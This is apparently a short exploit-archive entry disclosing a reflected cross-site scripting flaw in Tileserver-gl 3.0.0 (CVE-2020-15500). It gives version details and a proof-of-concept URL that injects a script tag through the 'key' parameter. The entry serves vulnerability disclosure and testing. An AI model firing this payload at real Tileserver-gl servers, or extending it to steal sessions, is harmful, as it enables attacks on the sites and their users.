Tileserver-gl 3.0.0 Cross Site Scripting

Tileserver-gl version 3.0.0 suffers from a cross site scripting vulnerability.


MD5 | 63b23bdee2d001f4b4ad1f9e7216ae76

# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
# Date: 15/04/2021
# Exploit Author: Akash Chathoth
# Vendor Homepage: http://tileserver.org/
# Software Link: https://github.com/maptiler/tileserver-gl
# Version: versions <3.1.0
# Tested on: 2.6.0
# CVE: 2020-15500

Exploit : http://example.com/?key="><script>alert(document.domain)</script>


Related Posts